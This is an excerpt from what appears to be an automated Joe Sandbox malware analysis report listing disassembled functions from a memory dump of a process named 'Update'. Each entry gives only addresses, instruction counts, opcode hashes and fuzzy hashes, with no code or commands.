                                                    Function 00007FF848F33491 Relevance: .2, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25428b32d97b61e51f6ebb3893fdce3224a162fcc893fe97200b6a8667dc5810
                                                    • Instruction ID: 8572f58c478dc5a8037f01280a78cf429220afd99ddca7d52b169b2bfb691efe
                                                    • Opcode Fuzzy Hash: 25428b32d97b61e51f6ebb3893fdce3224a162fcc893fe97200b6a8667dc5810
                                                    • Instruction Fuzzy Hash: A851B130B1DA494FD684FB1C9855A7AB3D2EFD8380F54067BE44DC32D6DE29E9418782
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F45AF8 Relevance: .2, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d786fb04aafcdf251b98d133391d31d7f36207b3cce018daded58a2b9a7bb41b
                                                    • Instruction ID: 8ca267f3952ed448d1d8a92b7406d60a45c630e795d451558b8f74c3ae158194
                                                    • Opcode Fuzzy Hash: d786fb04aafcdf251b98d133391d31d7f36207b3cce018daded58a2b9a7bb41b
                                                    • Instruction Fuzzy Hash: A351B171A0894E8FEB88EF28C854AA977A1FFA8740F1445A9D00AD72C6DE35FC47C740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F36D70 Relevance: .2, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c329752daed1f1fca18fd2feef0c64e3c3ffd8c18a992f1bc920413a44d4046
                                                    • Instruction ID: 901214f258cb81e3990708eea3962e457e17b349d4e5224696c2acb0ee143462
                                                    • Opcode Fuzzy Hash: 6c329752daed1f1fca18fd2feef0c64e3c3ffd8c18a992f1bc920413a44d4046
                                                    • Instruction Fuzzy Hash: 46419F3071DE095FEB98FA2C9455AB6B3E1FFA8350B10057ED44EC3696DE29F8428744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4AD70 Relevance: .2, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dae22585a08b88e5b6741138747405d446f51eb16de955a6a64d5d188b836dbf
                                                    • Instruction ID: f206ba765e04fb723be9a1c1d4a71a742d7aa7ec440c9c8b5831b3f5a410815b
                                                    • Opcode Fuzzy Hash: dae22585a08b88e5b6741138747405d446f51eb16de955a6a64d5d188b836dbf
                                                    • Instruction Fuzzy Hash: 4B51E330A1DE4E4FEBA4EB2C98456BA77E1FF64650F0001BAD41CD31D6EF29E8818384
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4D07A Relevance: .2, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa22f5c7907b60bfc9eb6dead0e359b9fe8813d08986ed55c5db76d2e7533127
                                                    • Instruction ID: 1156629a96b63ffd887a490093a1113fff04ceb88ab24d31a0bdbd9413f5a0ac
                                                    • Opcode Fuzzy Hash: fa22f5c7907b60bfc9eb6dead0e359b9fe8813d08986ed55c5db76d2e7533127
                                                    • Instruction Fuzzy Hash: 1D412831A0D6895FE358FB2C98565757BE0EF96B50B0401FBD84ECB1D3EE18AC068396
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F47E1C Relevance: .2, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bbccd74d3241c4be705fa7617795c2e19fe1fe22730353e2bde155205a3ad9fd
                                                    • Instruction ID: 20a168be0e35ee1fea4c659aee10429543fe256c3f5f99b17ca7041414128b08
                                                    • Opcode Fuzzy Hash: bbccd74d3241c4be705fa7617795c2e19fe1fe22730353e2bde155205a3ad9fd
                                                    • Instruction Fuzzy Hash: 9D51D03191DE0D4FEB58BB28A8066BA77E0EFA5750F10017BE44DE7183EF28A84187C5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F32E78 Relevance: .2, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b44ecebcccf0ab1ae8ab900c1b3cc4aff26e9db5993ba5f5a0952c61a2f7065e
                                                    • Instruction ID: df008118a7d355062b091afa9725544824ea92f9c8b45efb9f1aee49d5924792
                                                    • Opcode Fuzzy Hash: b44ecebcccf0ab1ae8ab900c1b3cc4aff26e9db5993ba5f5a0952c61a2f7065e
                                                    • Instruction Fuzzy Hash: D851B171E1C90A5FEB94EB6CA8955B977E2FF99351F10017AD40DC32D6DF34A8028784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F47E49 Relevance: .2, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 234249510b837ece602b91441c8042a403d9839da44f03635e60cd868299eb68
                                                    • Instruction ID: 5e0790e53494e08b52b064919f46d004aa17bd67d29c411dc7dfff483d449f82
                                                    • Opcode Fuzzy Hash: 234249510b837ece602b91441c8042a403d9839da44f03635e60cd868299eb68
                                                    • Instruction Fuzzy Hash: 45411531D0DE4E4FEB58AB28A8066BA77E0EFA5750F14017BE449E3183DF28684283D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3960E Relevance: .2, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db4c4d05ebfd75c588facad5e39aabb29e36c079e7726b5201e5c1c50a30f6d5
                                                    • Instruction ID: a08f46b83ac704b20bd8658f6fae6eceb0b0f5b3feb29fa2fb260c4dc180edc4
                                                    • Opcode Fuzzy Hash: db4c4d05ebfd75c588facad5e39aabb29e36c079e7726b5201e5c1c50a30f6d5
                                                    • Instruction Fuzzy Hash: 4B515BB1A1E98A5FD789EF38C855A66BBE1FF55340B0444AED04EC72C6DE38E806C740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4D41F Relevance: .2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f353451492bb4936d54d9602675bf6030a7cc74cf6ac54095aea16c1df5bdb9
                                                    • Instruction ID: 95f77a68d33d322cd5003f2928b4c05f28cd5f8c92fae61d5ff4a33a1472f390
                                                    • Opcode Fuzzy Hash: 6f353451492bb4936d54d9602675bf6030a7cc74cf6ac54095aea16c1df5bdb9
                                                    • Instruction Fuzzy Hash: 6F412B32A0F5916FE355F77CB8554E97BA0EF51679B0802BBC18C9B0E3DA1C244683A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F37E6D Relevance: .2, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06a5e21349d58ab2e04cd11b18ce0f3c8e6a1adc7d78e6499e298a277d5c1c40
                                                    • Instruction ID: 8e937a1a1f2bf17970a9aefd0332de1478052b384e81ffca11654804a9a447dc
                                                    • Opcode Fuzzy Hash: 06a5e21349d58ab2e04cd11b18ce0f3c8e6a1adc7d78e6499e298a277d5c1c40
                                                    • Instruction Fuzzy Hash: 1F41B531B2E9199FE744B76CA8566B977E1FF58750F1001BAE00DD32C3EE286C428686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F34BA8 Relevance: .2, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e4632433ff4891419c6791aef29c4f80e4d45f4551f28fce52668c75f205761
                                                    • Instruction ID: 8163d31e059b52148d7aade80fc6966267e8af9642eb9635f2b57a5b94f7e9fb
                                                    • Opcode Fuzzy Hash: 1e4632433ff4891419c6791aef29c4f80e4d45f4551f28fce52668c75f205761
                                                    • Instruction Fuzzy Hash: D5412772E2EACA5FE34AA73868651B53FA0EF52295F4801FBD04DC71D3DE0D58068355
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F42892 Relevance: .2, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4abc31990c53f731b6f1d9e32e4bc484b5de61accb1f385c6022c6c83d9d35d2
                                                    • Instruction ID: 87491f241f61f9f20ebe41068abc5c91973581be0228f66ac297f9dd24b396dd
                                                    • Opcode Fuzzy Hash: 4abc31990c53f731b6f1d9e32e4bc484b5de61accb1f385c6022c6c83d9d35d2
                                                    • Instruction Fuzzy Hash: 8341F432E0E94A4EE7A5A72894412F977E1FFF4799F04027BD40EF35C2EF2968064685
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F438B5 Relevance: .2, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c444e275604c404adaf8d2f46fa34f43706a2efd4630989f9336f59e7c8354c
                                                    • Instruction ID: 09bd540020f4fed4f72664244a098304179571d67b30058dbaed8e7c79e175c4
                                                    • Opcode Fuzzy Hash: 9c444e275604c404adaf8d2f46fa34f43706a2efd4630989f9336f59e7c8354c
                                                    • Instruction Fuzzy Hash: FD416831B0DA8A1FEB99A72C5455A767BD2EFA8754B0401BFD04DC72C7DE24EC064344
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F34388 Relevance: .2, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a5adaef778eeff395adf2c85af22dbf17c721b316604fdf54b54fb2a9b345da
                                                    • Instruction ID: a5e0c33774acb488b8ce6334e018dc8c0cc1cfe3b6bd821fda111c41ba1b6281
                                                    • Opcode Fuzzy Hash: 8a5adaef778eeff395adf2c85af22dbf17c721b316604fdf54b54fb2a9b345da
                                                    • Instruction Fuzzy Hash: 0A41A371E1C9098FEB45FF68D4496B9B3E1FBA8750F11017AD40ED3296DE38E9428781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F36D88 Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb985ad8e8767e5c37ad68c56ff238f507e062433fccf67f09f2f69830be7ebe
                                                    • Instruction ID: 965706282bf0b992bb3e529ed66556a9ff93e7d8ccfdabe40c1a9c4dcbdf2e10
                                                    • Opcode Fuzzy Hash: bb985ad8e8767e5c37ad68c56ff238f507e062433fccf67f09f2f69830be7ebe
                                                    • Instruction Fuzzy Hash: ED41A731B1DE0E5FD694FB6C9490676B3D2FF98391B64067AD00DC3685DF29E8428784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F49604 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc839f4678b63a0a1747a785155cc943b2ab85bc920f6990fecc82ee8f5b079a
                                                    • Instruction ID: 0310fdb9209e070a81369e24ce719d9546c30caf006ed60b461a2dc77cf1caa2
                                                    • Opcode Fuzzy Hash: dc839f4678b63a0a1747a785155cc943b2ab85bc920f6990fecc82ee8f5b079a
                                                    • Instruction Fuzzy Hash: A141F632A4EACA0FE797E77898546A57FE1DFA6660F0900FBD44CC75E3DA49480AC311
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F45C60 Relevance: .1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2ec77b479bef711e10f448897b1d3ce8ff4b42852449dc69f4c269a51344a6a
                                                    • Instruction ID: 39a71b94a62a483847d95d5c98f6c4ce65fb9c60b839ceeafe26a591fd2b2e4a
                                                    • Opcode Fuzzy Hash: e2ec77b479bef711e10f448897b1d3ce8ff4b42852449dc69f4c269a51344a6a
                                                    • Instruction Fuzzy Hash: 30413F30A1894A8FDB88EF58C494AA573B1FFA8740F104569D40AD729ACA35EC42CB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F36939 Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93d6182401f6c5bf103fbf3501f443f5cd6f85a2da2610d034b654d0e561e78a
                                                    • Instruction ID: 5b8027b9a5b23914d9b860f76d11d0bcaf556db2d8952bba376418d1d6478c5d
                                                    • Opcode Fuzzy Hash: 93d6182401f6c5bf103fbf3501f443f5cd6f85a2da2610d034b654d0e561e78a
                                                    • Instruction Fuzzy Hash: C1410221B2FA8A9FE385E7289865675BBE1EF55250F0442FBD00DC32D3DE1CA8448361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4B2FA Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 965513f50045bef9c6d895a2a2c0985a69e6fda5c6c16760ac1cadd0f816f89c
                                                    • Instruction ID: e8e62c5b48d5153323075612ed1a67f12e7e1fb262d76c512247928799916f1c
                                                    • Opcode Fuzzy Hash: 965513f50045bef9c6d895a2a2c0985a69e6fda5c6c16760ac1cadd0f816f89c
                                                    • Instruction Fuzzy Hash: 4E412331A1CA058FE754EB2CE8906A177E0FF65324F1406BBC448CB293CA29E883C780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4DB99 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b07b84e6b6bd32b41c49a2d18f4f81ba51aea02a7ede42c6a0c5eff40876c1e
                                                    • Instruction ID: 3f8cd138254814c459d0725f018341c88fb40d3daeac453fae71a5fb494ee242
                                                    • Opcode Fuzzy Hash: 8b07b84e6b6bd32b41c49a2d18f4f81ba51aea02a7ede42c6a0c5eff40876c1e
                                                    • Instruction Fuzzy Hash: 2C316F2194F6C66FE387A7385C654A03FB1EE6799170D41EBD088CB0E3DA08580EC351
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4D0F0 Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: decf9c08f548da332f1c863bdd06626ff1fee0d021c8cfa9b8a1d92bc1df1b0f
                                                    • Instruction ID: f1e1b730c385b8eb0830192e8440988e3d733302d863b4cd1cee005dcbc25465
                                                    • Opcode Fuzzy Hash: decf9c08f548da332f1c863bdd06626ff1fee0d021c8cfa9b8a1d92bc1df1b0f
                                                    • Instruction Fuzzy Hash: 5F310532B1C6495FE79CFB1C988697573D5EF99B50B0001BAE84EC7292EE24EC038285
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F344B5 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1efc450f7694775b4d52d59b2950f1f68b6cdfdefb370a9389e7239a4597188
                                                    • Instruction ID: 6078c3694477afc1fb1b14da4f72be309a19c127570f6cea3dc7eda87b171921
                                                    • Opcode Fuzzy Hash: d1efc450f7694775b4d52d59b2950f1f68b6cdfdefb370a9389e7239a4597188
                                                    • Instruction Fuzzy Hash: 3941E332D0DACA4FD782A76898251A87BB1EF66390F0801F7C408CB0E7DA2D18458795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4AF1D Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 688c9854f08f43c9700f139cf471f040c7368f6310298544b3ca0a9197760215
                                                    • Instruction ID: 07dfcdc51ebec2719005832c81d29f3e4079065e47d05e834a68095aadbc215f
                                                    • Opcode Fuzzy Hash: 688c9854f08f43c9700f139cf471f040c7368f6310298544b3ca0a9197760215
                                                    • Instruction Fuzzy Hash: DE312471A0DB588FDB95EB68A8545A83BE0EF66B51F0901BFD009D72D3DB249C05C741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F32818 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f59934537d3125fc1d99047561923827dbeabb510839f01480531ae824d16331
                                                    • Instruction ID: 7775327261f056446270f91a881f3b4f956807f029fa26909e4f8b1c49d9a9fb
                                                    • Opcode Fuzzy Hash: f59934537d3125fc1d99047561923827dbeabb510839f01480531ae824d16331
                                                    • Instruction Fuzzy Hash: 24315C31A1DA090EE62CAB599C410B573D1EB80761F20027FD49F835C7EF39B8938289
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F49645 Relevance: .1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 27331c66960f58fda15780af8b0d6700cad4acaa7437d1a71f1436e9bb061337
                                                    • Instruction ID: 8cd5651816f27c0be6d5e617772207c262a970d187ea458518e4199fd6aebbb1
                                                    • Opcode Fuzzy Hash: 27331c66960f58fda15780af8b0d6700cad4acaa7437d1a71f1436e9bb061337
                                                    • Instruction Fuzzy Hash: E031D622A4EAC61FD793E7B858546A13FE5DBA7560F0900EBD44CCB5A3DA49480BC351
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F51C28 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc447ce5f6bc36c1b3949e81683fb65e6ded96ee0a7e07a950117f80e6e461db
                                                    • Instruction ID: 477610e81284b65ac07f491bb54da2be8071f553fb6e79be1d042c9080fbf64b
                                                    • Opcode Fuzzy Hash: dc447ce5f6bc36c1b3949e81683fb65e6ded96ee0a7e07a950117f80e6e461db
                                                    • Instruction Fuzzy Hash: 4741D23090DA494FD768EB1C84556B6BBE0EB96360F1402BFE049C31D7CB65A886C3D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F48459 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee9cd668216c4a59893b0027b95239c12373c8650714a0d8be5ac40f59401b7d
                                                    • Instruction ID: 7f8c6074adcd041d1f41574c9165a925b9c1299492beb8496f446a06dba19eac
                                                    • Opcode Fuzzy Hash: ee9cd668216c4a59893b0027b95239c12373c8650714a0d8be5ac40f59401b7d
                                                    • Instruction Fuzzy Hash: CF413234A18A0D8FDB88EF1CC494AA973E2FFA8750F544569D41AD7295CF35EC82CB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848E1ED80 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2062838097.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848e1d000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f960654baaae49b27654577aa264c0b6eec4f334d636053d3eaa345533cade1
                                                    • Instruction ID: 4530eca714d000d50a5ed4b0d8fa51102e06ca328d432926510ef5cd29fdc629
                                                    • Opcode Fuzzy Hash: 8f960654baaae49b27654577aa264c0b6eec4f334d636053d3eaa345533cade1
                                                    • Instruction Fuzzy Hash: 0341E83180DBC48FD7969B3898459623FF0FF56360B1505DFE088CB1A3DA25A846C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F397C5 Relevance: .1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff6842cf8bafd436d0d1540cb5dcda45dd4a60e3616f1032acb9f9f33a2bbb12
                                                    • Instruction ID: 08cbe4b716b1b94ee5345b2be5a5e38b430e05901fdd26a3d9a011eca9466eb3
